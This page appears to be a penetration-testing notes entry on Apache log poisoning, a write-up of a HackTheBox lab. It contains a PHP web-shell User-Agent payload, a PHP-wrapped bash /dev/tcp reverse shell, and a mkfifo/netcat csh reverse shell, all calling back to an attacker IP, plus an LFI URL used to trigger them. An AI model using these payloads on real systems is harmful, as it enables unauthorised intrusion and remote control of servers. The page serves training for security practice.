Offensive Security
Offensive Security
About me / contact me
Penetration Testing with Kali
Note taking
Master your skills
OSCP
Information gathering
Gaining Access - Vulnerability Exploitation
Privilege Escalation
HTB
Active
Retired
VulnHub
Brainpan - 1 - Buffer Overflow
Web Vulnerabilities - OWASP TOP 10
SQL Injection
XXE - XML External Entity
Command Injection
Cross Site Scripting
Broken Authentication and Session Management
Insecure Direct Object References
Cross Site Request Forgery
Security Misconfiguration
Insecure Cryptographic Storage
Insufficient Transport Layer Protection
Other Web Vulnerabilities
Remote File Upload
Remote File Inclusion
Local File Inclusion
PHPInfo log - Race Condition
Log poisoning
Mail log
SSH log
Apache log
Personal Projects
WiFi Penetration Testing
Phishing attempts
News
Powered by GitBook

Apache log

Example from 10.10.10.84

Url http://10.10.10.84/browse.php?file=/var/log/httpd-access.log exposing apache log files:

Error message when contaminating the log with: 

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.20/3333 0>&1'");?>

Second try (reason for error message was that " character could not be processes by the log file). Changing to :

User-Agent: <?php system($_REQUEST['cmd']); ?>

We gain code execution through LFI:

The same request in Burp (useful when log files are full of data)

Gaining a reverse shell from FreeBSD through LFI with:

if [ -e /tmp/OGfWimIImwJMI ];then rm /tmp/OGfWimIImwJMI;fi;mkfifo /tmp/OGfWimIImwJMI;cat /tmp/OGfWimIImwJMI|/bin/csh -i 2>&1|nc 10.10.14.20 3333 > /tmp/OGfWimIImwJMI
Mind the /bin/csh, as users on this box do not have bash!

Make sure you URL encode the command in Burp before sending:

Result:

Reference:

​Shellpop - allowed me to construct the reverse shell for freeBSD.

Previous
SSH log
Next - Personal Projects
WiFi Penetration Testing
Last updated -8